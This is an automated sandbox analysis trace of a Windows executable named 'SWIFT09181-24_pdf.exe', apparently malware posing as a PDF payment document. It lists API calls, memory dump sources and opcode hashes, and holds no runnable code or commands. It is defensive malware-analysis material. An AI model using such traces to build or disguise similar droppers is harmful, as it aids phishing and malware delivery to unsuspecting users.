                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointerwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 327478801-0
                                                                                                                                    • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                                    • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                                                    • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                                    • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                                                    APIs
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 390214022-0
                                                                                                                                    • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                    • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                                    • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                    • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000463,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Open
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                    • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                                    • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                                                    • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                                    • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                                                    APIs
                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                    • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                    • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                                                    • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                    • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                    • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                                                    • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                    • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                                                    APIs
                                                                                                                                    • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2635351082.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2635332703.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635371796.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635394979.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                    • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                                    • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                    • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                                    APIs
                                                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                                    • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                                                    • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                                    • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                                    • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                                                    • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                                    • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                    • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                    • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                                    • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                    • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2635351082.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2635332703.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635371796.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635394979.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                    • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                    • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                    • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                    • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                      • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                    • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                    • CloseClipboard.USER32 ref: 00405676
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                    • String ID: {
                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                    • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                                    • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                                    • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                                    • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                    • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                      • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                      • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                      • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                      • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                      • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                                                    • API String ID: 2624150263-3131679198
                                                                                                                                    • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                                    • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                                    • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                                    • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001F38
